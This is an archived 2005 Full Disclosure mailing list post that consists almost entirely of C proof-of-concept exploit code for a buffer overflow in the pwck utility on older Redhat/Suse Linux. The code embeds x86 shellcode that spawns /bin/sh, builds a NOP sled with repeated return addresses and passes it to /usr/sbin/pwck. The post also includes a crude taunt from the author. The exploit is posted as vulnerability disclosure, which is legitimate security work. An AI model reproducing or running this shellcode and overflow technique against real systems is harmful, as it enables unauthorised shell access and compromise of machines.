Full Disclosure mailing list archives
PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
From: Day Jay <d4yj4y () yahoo com>
Date: Fri, 6 May 2005 18:03:26 -0700 (PDT)
----snip---- //Chung's Donut Shop release !! //Redhat/Suse PWCK Buffer overflow POC Code //(PWCK is NOT SETUID) This isn't fake //code I promise (it may be borrowed) ;) d4yj4y #include <stdlib.h> char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" "\x68"; unsigned long sp(void) { __asm__("movl %esp, %eax");} int main(int argc, char *argv[]) { int i, offset; long esp, ret, *addr_ptr; char *buffer, *ptr; offset = 1700; //the offset I first found worked esp = sp(); ret = esp - offset; buffer = malloc(2200); ptr = buffer; addr_ptr = (long *) ptr; for(i=0; i < 2200; i+=4) { *(addr_ptr++) = ret; } for(i=0; i < 1000; i++) { buffer[i] = '\x90'; } ptr = buffer + 200; for(i=0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buffer[2200-1] = 0; printf("d4yj4y fscked j00r mom!\n"); sleep(2); execl("/usr/sbin/pwck", "pwck", buffer, 0); free(buffer); return 0; } ----snip---- Yahoo! Mail Stay connected, organized, and protected. Take the tour: http://tour.mail.yahoo.com/mailtour.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Day Jay (May 06)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Steve Friedl (May 06)